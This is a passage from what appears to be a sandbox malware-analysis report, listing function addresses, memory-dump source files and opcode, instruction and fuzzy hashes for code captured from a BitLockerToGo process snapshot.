                                                                                                                                                                                                                                      • Opcode ID: 84f44e42ad13f43f88e73e62b0f1d26ce7495467c456272734e231ba1c165ae4
                                                                                                                                                                                                                                      • Instruction ID: 785eebaeadb1a5ebc0397e8a60f3b832d6ab4d4088a790c9abd5720b614cc183
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84f44e42ad13f43f88e73e62b0f1d26ce7495467c456272734e231ba1c165ae4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D711335800E2E099C717873540E44A2BFE24DAF10D76ED1CEE4D80E3A7C15BC55BDB26
                                                                                                                                                                                                                                      Function 004B01D1 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b5a6acf0a5123f2137e7f374d6140f5027ffc65d2b002939c819335f1aab1b61
                                                                                                                                                                                                                                      • Instruction ID: f8514b7217fcda035bc7555132745e31662538c6c12bbc54e41c79fcbc830d6f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5a6acf0a5123f2137e7f374d6140f5027ffc65d2b002939c819335f1aab1b61
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2711334800D2E059CB17873540A44A2BFE25DAF10D76ED1CED4D80E3A7C16BC55BDB22
                                                                                                                                                                                                                                      Function 0049B2A1 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f8dff21d32b4edd70ee944a9c499cd51c0f3271cc71836807b0541af6f187d93
                                                                                                                                                                                                                                      • Instruction ID: 9d67129557778a50ea57a144fc79fe316c5b1b092fc16dd0337bb92b0d87ccfe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8dff21d32b4edd70ee944a9c499cd51c0f3271cc71836807b0541af6f187d93
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D11334800D2E059CB17873541E44A2BFE25DAF10D76ED1CED4D80E3A7C1ABC59BDB22
                                                                                                                                                                                                                                      Function 004843E1 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 72d0175a3a8d4eef87f12b2ce0206d94db180d4334649bc0857bb45e289ea804
                                                                                                                                                                                                                                      • Instruction ID: 98d6c03187057b72b44add59a0e1880d9adf1dc01a03638af67d2b62cde77703
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72d0175a3a8d4eef87f12b2ce0206d94db180d4334649bc0857bb45e289ea804
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF11424800D2E059CB17873541E48A2BFE25DAF10D76ED1CEE4D80E3A7C1ABC59BDB22
                                                                                                                                                                                                                                      Function 004AF491 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 29da270fa5d491eaad34b2ac0198b735f62ffc8a516e1f3de989b7fddf8a82c7
                                                                                                                                                                                                                                      • Instruction ID: 1aab08a981bd5593fdacc285482ed404636ba538a0785af8106beeb6c1f43157
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29da270fa5d491eaad34b2ac0198b735f62ffc8a516e1f3de989b7fddf8a82c7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0711105900D2E058CB1B8B3540A44A2BFE24DAF10977ED0CDD4D80E3A7C05BC54BD736
                                                                                                                                                                                                                                      Function 0049B521 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9caecce223f425b988ef5f969a439f206a887f96cb418d33e70961c9e9aa471e
                                                                                                                                                                                                                                      • Instruction ID: 557bd6c88218e946b92f6513e863f44b929ddef8637c80995b18224481108957
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9caecce223f425b988ef5f969a439f206a887f96cb418d33e70961c9e9aa471e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB11335800D2E059C717873541E45A2BFE24DAF10D76ED1CEE4D80E3A7C19BC55BDB26
                                                                                                                                                                                                                                      Function 004A07B1 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a35e8ac9fd2640873bebd8bbb22db854201b75aacaa22404afa760aad674e6e3
                                                                                                                                                                                                                                      • Instruction ID: 5028f4853c8683c9181facec230d009915268887da1b98045564d5729fbe5163
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a35e8ac9fd2640873bebd8bbb22db854201b75aacaa22404afa760aad674e6e3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F011304800D2E059CB17873541A48A2BFE25DAF10D76ED1CEE4D80E3A7C1ABC59BDB22
                                                                                                                                                                                                                                      Function 004AF8F1 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9db204dd04da2ca979131bcff74e9f6ee24ac335898125e18afa43441302d06a
                                                                                                                                                                                                                                      • Instruction ID: 4bd35326a23452d0386f3c727cb0bc42df89a7327990da3e70aa9b3b80d6eda2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9db204dd04da2ca979131bcff74e9f6ee24ac335898125e18afa43441302d06a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F711104810D2E059CB1B8B3540A44A2BFE25DAF10976ED0CDD4D80E3A7C057C58BD736
                                                                                                                                                                                                                                      Function 004999F1 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e6259af7ea5161641a9a877822fbffa110a0b58a57ddd358ed7c6b578e3700b6
                                                                                                                                                                                                                                      • Instruction ID: 0653f9373fc7222e147de0371a9865c38c4bdf773d7f904f2bbf596efd823283
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6259af7ea5161641a9a877822fbffa110a0b58a57ddd358ed7c6b578e3700b6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F11224810D2E059CB17873540A45A2BFE25DAF10D76ED1CEE4D80E3A7C1ABC59BEB36
                                                                                                                                                                                                                                      Function 004ADC41 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 06a3a627224fe94079cf7f4d18bb48d0b523039b2b73c58b39c91a074af0cb39
                                                                                                                                                                                                                                      • Instruction ID: 70b0d6a13e90089bf79a4474274ddcd9f1a70d7c30c6a6d1a2c213875de95aad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06a3a627224fe94079cf7f4d18bb48d0b523039b2b73c58b39c91a074af0cb39
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2011224810D2E059CB17873540A44A2BFE25DAF10D76ED1CED4D80E3A7C1ABC59BDB26
                                                                                                                                                                                                                                      Function 004B0F61 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 077a519c789ad6857cc646788ef4b512e1c0d4ae77c2527a844077787f6a1704
                                                                                                                                                                                                                                      • Instruction ID: f7cfb7535beed75328812c216dbd659a119c0268db4989300eab4831ff5af092
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 077a519c789ad6857cc646788ef4b512e1c0d4ae77c2527a844077787f6a1704
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A11334800D2E059CB17873540A48A2BFE25DAF10D76ED1CEE4D80E7A7C1ABC55BDB22